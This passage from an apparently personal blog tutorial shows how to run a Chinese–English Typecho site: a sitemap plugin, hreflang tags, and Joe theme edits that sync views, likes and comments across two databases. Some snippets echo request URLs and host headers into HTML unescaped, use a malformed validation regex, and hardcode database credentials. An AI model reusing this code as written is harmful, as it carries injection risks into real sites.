($posts->next()) { $sitemap .= <<<EOF <url> <loc>{$posts->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$posts->date->format('c')}</lastmod> <priority>0.8</priority> </url> EOF; } } // add pages if (in_array('pages', $this->options->plugin('Sitemap')->sitemapBlock)) { $pages = Rows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 
'yearly' : 'monthly'; while ($pages->next()) { $sitemap .= <<<EOF <url> <loc>{$pages->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$pages->date->format('c')}</lastmod> <priority>0.5</priority> </url> EOF; } } // add categories if (in_array('categories', $this->options->plugin('Sitemap')->sitemapBlock)) { $categories = CategoryRows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($categories->next()) { $sitemap .= <<<EOF <url> <loc>{$categories->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.6</priority> </url> EOF; } } // add tags if (in_array('tags', $this->options->plugin('Sitemap')->sitemapBlock)) { $tags = Cloud::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($tags->next()) { $sitemap .= <<<EOF <url> <loc>{$tags->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.4</priority> </url> EOF; } } $sitemap .= '</urlset>'; $this->response->throwContent($sitemap, 'text/xml'); } } {/collapse-item} {/collapse} Please replace the blog URL in the code with your own. (I was too busy recently to create a separate configuration page, so I hardcoded the Sitemap URLs into the plugin for now.) Disable and then re-enable the plugin. Visiting https://<host>/sitemap.xml should now show the sitemap index: <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex> You should also be able to see that search engines like Bing Webmaster Tools have detected the English site's sitemap: Add hreflang This step informs search engines that the current page has multi-language versions, allowing them to show the appropriate page based on user language preference or location. We need to insert link tags like the following format within the <head></head> section: <link rel="alternate" hreflang="en-us" href="https://example.com/us"> <link rel="alternate" hreflang="fr" href="https://example.com/fr"> <link rel="alternate" hreflang="x-default" href="https://example.com/default"> Here, hreflang="x-default" indicates the default language for the page. The value of hreflang is composed of an ISO 639-1 language code and an optional ISO 3166-1 Alpha-2 region code (e.g., distinguishing between en, en-US and en-UK). Add the following content to the relevant section of your theme's <head></head>: <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the link tags echo '<link rel="alternate" hreflang="zh-cn" href="'.$new_url_cn.'" />'; echo '<link rel="alternate" hreflang="en-us" href="'.$new_url_en.'" />'; echo '<link rel="alternate" hreflang="x-default" href="'.$new_url_cn.'" />'; ?> This needs to be added to both the Chinese and English sites. After this, you should find the corresponding hreflang configuration in the <head> section of your website pages. Sync Like Counts and View Counts This step is highly theme-dependent and might not apply to all themes. I use the Joe theme, which handles reading and writing like counts and view counts to the database directly. 
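Each of the theme edits that follow opens its own connection to the Chinese instance's database, so the same credentials end up pasted into several functions. If you prefer, that connection can be wrapped once in a small helper and reused by every patched function; a sketch under the same assumptions as the diffs below (the helper name _joeCnDb is mine, and the host, user, password and prefix are placeholders):

<?php
/* Hypothetical helper, e.g. near the top of the theme's core/function.php:
   returns one shared Typecho_Db handle pointing at the Chinese instance,
   so the connection details are written only once. */
function _joeCnDb()
{
    static $db = null;
    if ($db === null) {
        $db = new Typecho_Db('Mysql', 'typecho_' /* table prefix */);
        $db->addServer([
            'host'     => 'mysql',      // placeholder host
            'user'     => 'typecho',    // placeholder user
            'password' => '[CENSORED]',
            'charset'  => 'utf8mb4',
            'port'     => 3306,
            'database' => 'typecho'
        ], Typecho_Db::READ | Typecho_Db::WRITE);
    }
    return $db;
}

With that in place, each modified function could simply call $db = _joeCnDb(); instead of repeating the addServer block. The diffs below are kept verbatim so they match the theme files line by line.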
I modified the English instance's theme code to read and write these values directly from/to the Chinese instance's database. Modify the function that retrieves view counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Views */ function _getViews($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $item->cid))['views']; if ($type) echo number_format($result); else return number_format($result); } Modify the function that retrieves like counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Like Count */ function _getAgree($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $item->cid))['agree']; if ($type) echo number_format($result); else return number_format($result); } Modify the code displaying view counts on the homepage in <webroot>/en/usr/themes/Joe/core/route.php: $result[] = array( "mode" => $item->fields->mode ? $item->fields->mode : 'default', "image" => _getThumbnails($item), "time" => date('Y-m-d', $item->created), "created" => date('d/m/Y', $item->created), "title" => $item->title, "abstract" => _getAbstract($item, false), "category" => $item->categories, - "views" => number_format($item->views), + // "views" => number_format($item->views), + "views" => _getViews($item, false), "commentsNum" => number_format($item->commentsNum), - "agree" => number_format($item->agree), + // "agree" => number_format($item->agree), + "agree" => _getAgree($item, false), "permalink" => $item->permalink, "lazyload" => _getLazyload(false), "type" => "normal" ); The code displaying view counts on the article page itself already uses _getViews, so it doesn't need modification. Modify the code that increments view counts: /* Increase View Count - Tested √ */ function _handleViews($self) { $self->response->setStatus(200); $cid = $self->request->cid; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { Modify the code for liking and unliking: /* Like and Unlike - Tested √ */ function _handleAgree($self) { $self->response->setStatus(200); $cid = $self->request->cid; $type = $self->request->type; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! 
Blocked!")); } /* SQL injection check */ if (!preg_match('/^[agree|disagree]+$/', $type)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { After making these changes and saving, visiting the English site should show view counts and like counts synchronized with the Chinese site. Sync Comments I initially thought about creating a plugin that hooks into the comment submission function to simultaneously insert comment data into the other instance's database. However, I found that my Joe theme already hooks into this, and adding another hook might cause conflicts. Therefore, I directly edited the Joe theme's code. Edit <webroot>/index/usr/themes/Joe/core/factory.php: <?php require_once("phpmailer.php"); require_once("smtp.php"); /* Enhanced Comment Interception */ Typecho_Plugin::factory('Widget_Feedback')->comment = array('Intercept', 'message'); class Intercept { public static function message($comment) { ... Typecho_Cookie::delete('__typecho_remember_text'); + + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho_en', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho_en' + ], Typecho_Db::READ | Typecho_Db::WRITE); + + $row = [ + 'coid' => $comment['coid'], // Must include the newly generated comment ID + 'cid' => $comment['cid'], + 'created' => $comment['created'], + 'author' => $comment['author'], + 'authorId' => $comment['authorId'], + 'ownerId' => $comment['ownerId'], + 'mail' => $comment['mail'], + 'url' => $comment['url'], + 'ip' => $comment['ip'], + 'agent' => $comment['agent'], + 'text' => $comment['text'], + 'type' => $comment['type'], + 'status' => $comment['status'], + 'parent' => $comment['parent'] + ]; + + // Insert data into the target database's `comments` table + $db->query($db->insert('typecho_comments')->rows($row)); return $comment; } } ... Perform the same operation on the English instance, inserting comments into the Chinese database. One issue with this scheme is that if you need to delete spam comments, you must delete them separately in both instances. I'll fix that later (maybe). Reference: typecho/languages - GitHub